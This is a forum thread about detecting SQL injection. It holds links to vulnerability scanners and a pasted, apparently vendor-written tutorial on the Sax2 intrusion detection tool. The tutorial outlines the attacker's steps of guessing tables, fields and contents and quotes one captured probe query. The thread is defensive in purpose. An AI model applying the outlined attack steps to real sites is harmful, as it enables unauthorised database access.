Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

How to Detect SQL Injection Attacks


  • Please log in to reply
2 replies to this topic

#1 JackCheng

JackCheng

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:51 AM

Posted 23 February 2010 - 03:09 AM

My server encountered SQL Injection Acctacks. Please, somebody, recommend an intrusion detection tool. Thanks in advanced!

BC AdBot (Login to Remove)

 


#2 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 50,961 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:10:51 AM

Posted 23 February 2010 - 03:13 PM

Using Database Caches to Detect SQL injection - To Cache a Thief
How to detect and stop SQL injection attacks
SQL Inject-Me to test for SQL Injection vulnerabilities - SQL Inject-Me FAQs

Finding SQL Injection with HP Scrawlr

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities...

Download HP Scrawlr

Free Edition of Acunetix Web Vulnerability Scanner
Online Tools: SQL Injection Vulnerability Test

Edit: Fixed link

Edited by quietman7, 23 February 2010 - 03:38 PM.

.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#3 JackCheng

JackCheng
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:51 AM

Posted 07 March 2015 - 06:19 AM

I found a great tutorial, please see these text below: What is SQL Injection Attacks

With the growing up of B/S model application development, more and more programmer write program with it. Unfortunately, many programmers did not judge the validity of users’ input data during encoding, and then, there will be security risk in the application.

Malicious attackers submit a special section of database query code to the server, the server will disclosure some sensitive information when respond with corresponding result. This is SQL Injection Attacks. The main trend Firewall currently will not alarm when there is SQL attack because of the SQL Injection is via normal point and hidden and difficult to be detected, seemingly normal website visit.

The danger of SQL Injection Attacks

According to the statistics of CVE in 2006, there are more than 70% attacks based on web application. The SQL Injection Attacks increase year by year, it arrives at 1078 in 2006. Even though, these data is only for the vulnerability in universal applications currently.

CVESQLInjectVulnerabilities.gif

The danger of SQL Injection Attacks including:

     primary.gifChange the data in database without authorization.
     primary.gifGain the administration authority of a site without authorization.
     primary.gifMaliciously change content of a site without authorization.
     primary.gifXSS attacks.
     primary.gifGain the control authority of the server without authorization.
     primary.gifAdd, delete and change the accounts in the server without authorization.
 

The process of detect and revert SQL Injection Attacks with Sax2

Some IDS software will execute effective detection for SQL Injection Attacks, though, firewall can not. Now, we go to the process of detect and revert SQL Injection Attacks with IDS software Sax2.

The steps of SQL Injection Attacks are:

a) Determine environment to find the injection point.
B) Determine the type of database.
c) Guess datasheet.
d) Guess the field.
e) Guess the content.

The steps “Guess datasheet”, “Guess the field” and “Guess the content” are very important fro SQL Injection Attacks during the full process. Let’s analyze these there steps.

Sax2 will detect and alarm the attacks in network real-time. It will show the in the table Event when there is SQL Injection Attacks, see the figure 1.

DetectSQLInjectionAttacks%281%29.gif

Figure 1 Sax2 alarm the MS_SQL Injection Attacks real-time

The selected event in the Figure 1 shows the attacker’s IP 192.168.21.103, the victim’s IP 125.65.112.10. And the original message is “select * from [dirs]”, means enquire whether there is a datasheet named “dirs” in current database, in the Original Communication view.
The attacker will repeat the operation to gain the expected datasheet. He will try to guess the filed in the datasheet if found the corresponding datasheet in the database.

DetectSQLInjectionAttacks%282%29.gif

Figure 2 Sax2 analysis the attacker is guessing the filed in the admin database

The code in the red circle in the Figure 2 show the attacker is guessing the “paths” filed in the admin database. Also, the attacker will repeat the operation till find the corresponding filed.

The attacker will determine the length of the filed and guess the content after found the corresponding filed. It will be a SQL Injection Attacks after the attacker guess the content in the filed successfully. Sometimes, the attacker has to decryption the content if it in MD5 encryption.

Above is the whole process of SQL Injection Attacks and we detect it with Sax2. As we know, Sax2 can effectively detect and alarm the SQL Injection Attacks when it occurs. IDS software Sax2 is a useful tool for SQL Injection Attacks and make your network security combine with firewall software.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users